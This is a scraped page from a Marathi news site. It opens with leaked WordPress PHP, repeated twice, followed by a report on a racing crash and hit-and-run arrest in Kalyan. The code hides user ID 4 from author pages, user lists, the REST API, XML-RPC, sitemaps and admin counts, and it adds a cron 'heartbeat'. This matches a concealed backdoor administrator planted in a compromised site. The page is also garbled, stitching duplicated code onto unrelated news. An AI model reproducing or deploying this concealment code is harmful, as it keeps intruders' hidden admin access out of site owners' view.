add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
नवीन वडवली रोडवरील रेसिंगचा थरार अखेर तुरुंगात संपला! - crimeaala.com
दि.२३ कल्याण : खडकपाडा पोलीस स्टेशन हद्दीत भरधाव वेगात स्टंटबाजी आणि रेसिंग करणाऱ्या कारचालकाने अॅक्टिवा चालकाला धडक देऊन गंभीर जखमी केल्याची धक्कादायक घटना उघडकीस आली आहे. पोलिसांनी केवळ ४८ तासांत आरोपीस वाहनासह ताब्यात घेत ठोस कारवाई केली आहे. दि. १८ फेब्रुवारी २०२६ रोजी रात्री सुमारे ११ वाजता नवीन वडवली रोड, भंडारी चौकाकडे जाणाऱ्या मार्गावर अज्ञात चारचाकी वाहनाने भरधाव वेगात अॅक्टिवा क्र. एमएच ०५ सीएन ०२६३) ला मागून जोरदार धडक दिली. या अपघातात अॅक्टिवा चालकाच्या डोक्याला व उजव्या हाताला गंभीर दुखापत झाली.
जखमींच्या मुलाने दि. १९ फेब्रुवारी रोजी खडकपाडा पोलीस ठाण्यात तक्रार दाखल केली. त्यानुसार गु.रं.नं. ९१/२०२६ भा.न्या.सं. ११०, २८१, १२५ (अ)(ब) तसेच मोटार वाहन कायदा कलम १३४(२)(ब), १८४ अन्वये गुन्हा नोंद करण्यात आला. अपघातानंतर आरोपीने कोणतीही वैद्यकीय मदत न करता घटनास्थळावरून पळ काढला होता. सुरुवातीला कोणताही ठोस पुरावा नसतानाही पोलिसांनी सीसीटीव्ही फुटेज, प्रत्यक्षदर्शी साक्षीदार व तांत्रिक तपासाच्या आधारे आरोपीचा माग काढला. तपासादरम्यान आरोपी मनीष सतीश मनवानी (कार क्र. एमएच ०५ जीडी ११११) यास ताब्यात घेण्यात आले. तपासात धक्कादायक बाब समोर आली की, संबंधित कारसह आणखी दोन कार (एमएच ०५ एएक्स ७०११ व एमएच ०४ एफएम ९९९) रात्रीच्या वेळी नवीन वडवली रोडवर रेसिंग आणि स्टंटबाजी करत होत्या. त्याचदरम्यान हा अपघात घडला. दोन्ही इतर वाहनचालकांवरही स्वतंत्र गुन्हे दाखल करण्यात आले आहेत ठाणे शहर पोलीस आयुक्तालयाने नागरिकांना पुढील आवाहन करण्यात आले आहेत:
१)अल्पवयीन मुलांना वाहन चालविण्यास देऊ नये,
२)वाहतूक नियमांचे काटेकोर पालन करावे,
३)वेगमर्यादा ओलांडू नये
४)रस्त्यावर स्टंटबाजी किंवा रेसिंग करू नये
ही कारवाई ठाणे शहर पोलीस आयुक्तालय यांच्या मार्गदर्शनाखाली खडकपाडा पोलीस ठाण्यातील डीबी पथकाने केली.